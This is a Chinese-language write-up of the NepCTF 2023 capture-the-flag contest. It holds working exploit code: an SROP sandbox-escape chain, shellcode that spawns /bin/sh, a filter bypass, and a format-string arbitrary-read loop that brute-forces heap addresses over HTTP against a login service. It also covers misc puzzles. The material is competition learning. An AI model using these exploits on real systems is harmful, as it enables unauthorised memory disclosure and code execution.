Nep2023的wp
0x00 闲言碎语
2023.8.14 记录11-13的紧张刺激。46名结赛。
非常高兴能够参加NepCTF2023,以一个初出茅庐的新人的身份参加。ctf的乐趣在于学习和探索,同时我也有想证明自己的成分。
连续两天的凌晨四点睡觉,让我体会着比赛的魅力。每当我纠结一道题(code是第一晚,陌生的语言和login是第二晚)到凌晨四点沉沉睡去之后,第二天九点醒来总会伴随着灵光一闪。随后势如破竹解开题目。
真的很满足。
比赛的同时还被其他的一些事情牵制。比较遗憾的是比赛的最后结束一分钟才做出来一道pwn,如果那题做出来我就能杀进前四十,拿到一个证书和贴纸。可是没做出来就是没做出来,谁又能决定当下发生什么呢。
就像三哈师傅说的,ctf的魅力是挑战未知、知识、收获,还有友谊和成长。
这个过程的收获真的很丰富啊,Nep的师傅出的pwn题拓展性强,难度不高,大大的拓展了pwn在我眼里的可能性。而简单的misc也让我看到了网络空间安全世界的各种可能性。
我很享受这个比赛。
不过据说46也有贴纸,我的心里还算是有些安慰。终于能有一次只凭借自己的实力,拿到了一份属于自己的ctf的荣誉啊!
总体来说,也算是满载而归了。打完比赛的时候,后劲很大,回味无穷。仿佛刚刚结束了一场马拉松(虽然我没跑过哈哈哈哈)。
以下的wp是按照当时的解题顺序写的,参照前言也能窥见一二我当时的状态和比赛的乐趣。
0x01 srop
本题算是pwn的签到题目,使用srop手法控制参数。
使用seccomp-tools发现有沙盒,只能使用open,read和write。
难点是调节寄存器,需要一定调试能力。我调了一段时间。
这里orw三个函数goto 0009,0009是return ALLOW说明允许执行。
如果是goto 0010,就是禁用了。
前面有一些没用的参数设置(请忽略)。下面exp里有详细的注释。
(这题想走ret2csu打orw,但是卡在call那里了,不知道为什么找不到原因)
我到时候自己看,懂的师傅教教
from evilblade import *
context(os='linux', arch='amd64')
context(os='linux', arch='amd64', log_level='debug')
setup('./pwn')
#libset('libc-2.23.so')
rsetup('nepctf.1cepeak.cn',30418)
evgdb('b 0x4007A8')
lv = 0x000000000040074e
rsir15 = 0x0000000000400811
rdi =0x0000000000400813
pp6 = 0x40080A
read = 0x400799
bss = 0x601500
r3 = 0x004007F0
nothing = 0x040082c
syscall = 0x004005B0
srop = 0x400750
frame = SigreturnFrame()
frame.rax = 0x20
frame.rdi = 0
frame.rsi = 0 #rdi
frame.rdx = bss #rsi
frame.rcx = 0x400 #rdx
frame.rip = syscall
frame.rsp = bss
#上面这些是设置寄存器参数。
#但是由于是call syscall这个库函数,而不是直接syscall
#寄存器会存在一些偏移,要经过调试得出
#(如上,例如rsi实际上存到rdi去了,rdx的存到rsi了)
sl(b'aaaaaaaabaaaaaaacaaaaaaadaaaaaaaeaaaaaaafaaaaaaa'+p64(0x601020)+p64(rdi)+p64(0xf)+p64(syscall)+bytes(frame)+b'flag\x00')
#这边使用rdi传递0xf参数给syscall,进行SROP
#(这里为什么不直接orw?因为无法直接控制rdx,ret2csu行不通,卡在call r12那里,具体原因赛后看看)
##############占个位置,到时候搞清楚了插上旗子【 】############3
#所以用srop走
flag = 0x601610
frame2 = SigreturnFrame()
frame2.rax = 0x20
frame2.rdi = 2 #rax
frame2.rsi = flag #rdi
frame2.rdx = 0 #rsi
frame2.rcx = 0x20 #rdx
frame2.rip = syscall
frame2.rsp = flag+8
flag = 0x601610
frame3 = SigreturnFrame()
frame3.rax = 0x20
frame3.rdi = 0 #rax
frame3.rsi = 3 #rdi
frame3.rdx = bss+0x400 #rsi
frame3.rcx = 0x80 #rdx
frame3.rip = syscall
frame3.rsp = 0x601728
flag = 0x601610
frame4 = SigreturnFrame()
frame4.rax = 0x20
frame4.rdi = 1 #rax
frame4.rsi = 1 #rdi
frame4.rdx = bss+0x400 #rsi
frame4.rcx = 0x80 #rdx
frame4.rip = syscall
frame4.rsp = 0x601838
#直接设置参数打orw
sme = p64(rdi)+p64(0xf)+p64(syscall)
pause()
sl(sme+bytes(frame2)+b'flag\x00\x00\x00\x00'+sme+bytes(frame3)+sme+bytes(frame4)+p64(0xdeadbeef))
#栈溢出
ia()orw拿到flag。
0x02 与AI共舞的哈夫曼
让gpt写一下解压的python,训练一下就可以得到答案。
import heapq
import os
class HuffmanNode:
def __init__(self, char, freq):
self.char = char
self.freq = freq
self.left = None
self.right = None
def __lt__(self, other):
return self.freq < other.freq
def build_huffman_tree(frequencies):
heap = [HuffmanNode(char, freq) for char, freq in frequencies.items()]
heapq.heapify(heap)
while len(heap) > 1:
left = heapq.heappop(heap)
right = heapq.heappop(heap)
merged = HuffmanNode(None, left.freq + right.freq)
merged.left = left
merged.right = right
heapq.heappush(heap, merged)
return heap[0]
def build_huffman_codes(node, current_code, huffman_codes):
if node is None:
return
if node.char is not None:
huffman_codes[node.char] = current_code
return
build_huffman_codes(node.left, current_code + '0', huffman_codes)
build_huffman_codes(node.right, current_code + '1', huffman_codes)
def compress(input_file, output_file):
with open(input_file, 'rb') as f:
data = f.read()
frequencies = {}
for byte in data:
if byte not in frequencies:
frequencies[byte] = 0
frequencies[byte] += 1
root = build_huffman_tree(frequencies)
huffman_codes = {}
build_huffman_codes(root, '', huffman_codes)
compressed_data = ''
for byte in data:
compressed_data += huffman_codes[byte]
padding = 8 - len(compressed_data) % 8
compressed_data += '0' * padding
with open(output_file, 'wb') as f:
# Write frequency information
f.write(bytes([len(frequencies)]))
for byte, freq in frequencies.items():
f.write(bytes([byte, (freq >> 24) & 0xFF, (freq >> 16) & 0xFF, (freq >> 8) & 0xFF, freq & 0xFF]))
# Write compressed data
for i in range(0, len(compressed_data), 8):
byte = compressed_data[i:i+8]
f.write(bytes([int(byte, 2)]))
def decompress(input_file, output_file):
with open(input_file, 'rb') as f:
data = f.read()
# Read frequency information
num_symbols = data[0]
frequencies = {}
index = 1
for _ in range(num_symbols):
byte = data[index]
freq = (data[index + 1] << 24) | (data[index + 2] << 16) | (data[index + 3] << 8) | data[index + 4]
frequencies[byte] = freq
index += 5
root = build_huffman_tree(frequencies)
decoded_data = []
current_node = root
for byte in data[index:]:
bits = [int(bit) for bit in f"{byte:08b}"]
for bit in bits:
if bit == 0:
current_node = current_node.left
else:
current_node = current_node.right
if current_node.char is not None:
decoded_data.append(current_node.char)
current_node = root
with open(output_file, 'wb') as f:
f.write(bytes(decoded_data))
if __name__ == "__main__":
input_file = 'input.txt'
compressed_file = 'compressed.bin'
decompressed_file = 'decompressed.txt'
# 解压缩文件
decompress(compressed_file, decompressed_file)0x03 小叮弹钢琴
本人pwn手+业余音乐人,撞到专业枪口上了()。
丢进水果。
前面的长长短短是摩斯电码,后面就是数字了,得到信息:
YOU SHOULD USE THIS TO XOR SOMETHING
0x370a05303c290e045005031c2b1858473a5f052117032c392305005d1e17
然后根据前面是NepCTF,去异或试了几下,发现得到的是you,那么就是需要异或YOU SHOULD USE THIS TO XOR SOMETHING这一个字符串无疑了。
去异或了一下得到答案。
~/ctf/match/nep2023/piano » python exp.py N1nE@N1nEmAn
NepCTF{h4ppy_p14N0}NepCTFqh4pp
# 原始文本和密文
text = "youshouldusethistoxorsomething"
ciphertext = bytes.fromhex("370a05303c290e045005031c2b1858473a5f052117032c392305005d1e17")
# 将文本转换为字节序列
text_bytes = text.encode()
# 逐位异或操作并生成解密结果
decrypted_bytes = bytes([a ^ b for a, b in zip(text_bytes, ciphertext)])
# 将解密结果转换为字符串
decrypted_text = decrypted_bytes.decode()
print(decrypted_text)
0x04 ConnectedFive
下五子棋,下下下下,下赢了就行了。
本题注意的就是要提供稳定的网络环境哈哈哈哈哈别下一半卡了,好多师傅说卡。
嗯,没啥多说的。
0x05 codes
这题很抽象,也是我花时间最长的一题(是不是有点蠢……),所以我花多一点篇幅讲讲。
1.初步尝试:shellcode
在得知sys,env,open,read,write都被过滤之后,作为一个pwn手首先想到了就是使用shellcode。发现\x也被过滤,转而写了个可打印字符串的shellcode,然后又发现不如直接用整数冒充shellcode。
#include <stdio.h>
#include <stdlib.h>
int main() {
// 声明一个函数指针
void (*func_ptr)();
long long int values[] = {
0x006362616858556a,
0x5e000001ff685f54,
0x6858016a5f50050f,
0xe3c1485b766e652f,
0x03486e69622f6820,
0x6a5e5453006a241c,
0x00000000050f5a08
};
func_ptr = (void (*)()) values;
long long int a = values;
a = a & 0xfffffffff000;
mprotect(a, 0x1000, 7);
// 调用函数指针,执行跳转到字符串
func_ptr();
return 0;
}很帅吧,可惜我没想到出题人这么阴,mprotect也禁了……想尝试写一个/bin/env的sh文件,然后再命令/bin/sh 执行他。也不行捏。
2.字符串拼接posix_spawn
可以执行任意命令,但是env命令没有回显,白给。
并且尝试了子进程创建等等方式,无果。
#include <stdio.h>
#include <string.h>
#include <spawn.h>
int main() {
pid_t child_pid;
char path[100] = "/bin/l"; // 初始路径
strcat(path, "s"); //
char *const argv[] = { path, "-l","/dev", NULL }; // 命令行参数,包括路径和命令参数
int result = posix_spawn(&child_pid, path, NULL, NULL, argv, NULL);
if (result == 0) {
// 等待子进程结束
waitpid(child_pid, NULL, 0);
} else {
// 错误处理
perror("posix_spawn");
}
return 0;
}3.惊人的答案
打印虚空变量即可。
#include <stdio.h>
int main(int argc, char *argv[], char *e[]) {
for (int i = 0; e[i] != NULL; i++) {
printf("%s\n", e[i]);
}
return 0;
}
0x06 陌生的语言
本题根据提示可知是小魔女学园的月文和龙语。
比较考察搜索能力。有意思的事情是在对照完月文之后,直接搜索提示的人名和小魔女学园HEART IS YOUR MAGIC可以得到flag(相信的心就是你的魔法!)。
不过出题人在前面加了个NEPNEP,所以最后还是灰溜溜查龙文才做出来。
https://tieba.baidu.com/p/4945307221#/
查就完事了。
在这里夸夸手机版bing和百度贴吧,感谢你们强劲的搜索能力和用户的高质量。
0x07 login
这题本来是抢三血的,奈何不知道怎么发送格式,白白浪费了大好时机,凌晨三点半眼睁睁看着三血被抢走。还是没能拿到一个属于自己的前三。
顺便记录一下用dockerfile复现的方式。
~/ctf/match/nep2023/review » sudo systemctl restart docker
重启服务
~/ctf/match/nep2023/review » sudo docker build -t login .
执行dockerfile
~/ctf/match/nep2023/review » docker images
查看是否创建成功
~/ctf/match/nep2023/review » docker run -i -d -P login
创建容器
~/ctf/match/nep2023/review » docker ps
查看端口
结束的话使用docker stop docker的名字
给docker的程序调试
ps -ef | grep 'login'
看进程
sudo gdb attach __id__
来进行debug
docker exec -it <CONTAINER_ID_or_NAME> /bin/bash
进入docker
docker rmi -f <IMAGE_ID>
删除镜像出题师傅给的附件run.sh要删去
echo $GZCTF_FLAG>/flag.txt
export GZCTF_FLAG=flag{test}改为
#!/bin/bash
while true; do
# 复制 flag.txt
cp /flag.txt /home/ctf/
# 在 chroot 环境中执行 login 程序
chroot /home/ctf /bin/bash -c "/bin/bash -c "./login" "
# 休眠 60 分钟
sleep 3600
done因为我们这儿没有GZCTF的环境变量,不然的话就会像我一样复现不出来flag哈哈哈。
1.静态分析
(取附件方法在2.里头,两个方法)
本题查看ida,发现在登录的时候存在格式化字符串漏洞。
可以查到栈上所有数据。
从这个函数发现flag是被加载到了堆里。
开头执行了这个函数。
所以我们要做的就是在栈上把堆的地址找出来,然后用%s打印出flag。
根据ida的栈值除以8,发现偏移在15090左右,然后用for循环一个一个看,发现15059存在堆地址。(其中第16个是字符串‘./www’的地址,这个是pie地址的,所以可以形成对照确定这个是堆地址而不是程序自身地址)
找到堆地址之后 二分法爆破。
一开始想从前0x1000爆破到后0x1000,有点太慢了,所以改了以已知为中心爆破
2.实施攻击
2.1 下载附件
随便登录一下,一直走到这儿。
因为点击readme.txt之后,得到一个下载链接虽然进不去。但是把readme.txt改成login之后就下载附件了。
输入ip:32769/view_file/login作为链接即可下载附件。
出题师傅的方法是ctrl+u查看源码。(要 学 一 点 web!!!)
然后使用list_flies。
这样是相对路径。
这样就是/的绝对路径了。从这里直接点login也可以下载到,会跳转到刚才我说的链接去。
2.2 调试爆破栈上内存 寻找自己偏移
密码就是随便输入就行,user这里看ida知道是有格式化字符串漏洞。
本身偏移
输入:
结果:
堆偏移
输入:
结果:
2.3 任意地址读
这题学到了GET请求的方式,以及POST,以后遇到http的题目再也不怕啦!
存着好好学学。
要注意,先登录一下,并且点开界面还有readme.txt,让他把堆地址都载入栈中(执行相应malloc)。
注意有时候输出的%s太大会崩……
from evilblade import *
import requests
context.log_level = 'debug'
value = p64(0x55d023f147a0)
#这里写使用%15059$p手动泄露的地址。
value1 = value
value2 = value
url = "http://106.75.63.100:34897/login"
#这里写ip和端口
while True:
#加的
value1 = p64(u64(value1)+0x10) # 增加0x10的步长
params1 = {
"user": b'%36$s---' + value1,
"password": "a"
}
#user 这么写是因为本身偏移是35,但是一开始写地址的话存在\x00截断
#所以把地址写在了后面,就变成偏移36了
#并且这里除了%36$s还要填充八个字节,保证对齐
dpx('nows value1',u64(value1))
response1 = requests.get(url, params=params1)
dp('message\n', response1.text)
#dp就是dataprint,我自己库 魔刀千刃evilblade 的实现函数。
if 'CTF' in response1.text:
break
value2 = p64(u64(value2)-0x10) # 减少0x10的步长
params2 = {
"user": b'%36$s---' + value2,
"password": "a"
}
dpx('nows value2',u64(value2))
response2 = requests.get(url, params=params2)
dp('message\n', response2.text)
if 'CTF' in response2.text:
break
#sleep(0.1) # 等待一段时间再继续下一次请求
0x08 HRP-CHAT-3
遗憾离场。
根据源码得知,子程序崩溃后,进入安全模式可以拿到flag。
from evilblade import *
context(os='linux', arch='amd64')
context(os='linux', arch='amd64', log_level='debug')
rsetup('nepctf.1cepeak.cn',31526)
ru(b'help')
sl(b'Login\n')
sla('6',b'Login\n'*0x1000)
#然后随意输入数据d73-16f1-418d-a,乱点回车
#子程序崩溃进入安全模式
#Safe_Mode_Key
ia()一顿乱打(一定要连续输入回车,溢出info数组)让他崩溃,然后输入Safe_Mode_Key拿到flag。
期待剩下三个flag的解法……到时候看看别人wp学习学习。
0xFF 尾声
最后再次感谢所有Nepnep联合战队成员为比赛做出的贡献!体验非常好!特别感谢HRP师傅对我在pwn方向的一些指导。希望大家一起进步!
NepCTF2024,再见!
手机扫一扫
移动阅读更方便
你可能感兴趣的文章